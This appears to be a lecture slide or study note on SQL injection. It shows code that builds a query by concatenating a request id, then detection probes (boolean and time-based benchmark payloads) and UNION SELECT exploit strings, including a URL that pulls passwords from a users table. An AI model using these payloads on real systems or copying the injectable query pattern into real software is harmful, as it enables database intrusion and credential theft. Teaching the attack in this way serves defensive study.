13. …
Q = “select username from users where id=“ + req_id;
print(db_query(Q));
…
Detect:
‘ and 1=1 / ‘ and 1=0
‘ and benchmark (9999999,md5(1))
Exploit:
‘ union select 1,2,3,4,5 from table2 – comment out
http://target.com/?id=-1 union select password from users -- c
select username from users where id=-1 union select password from users -- c
13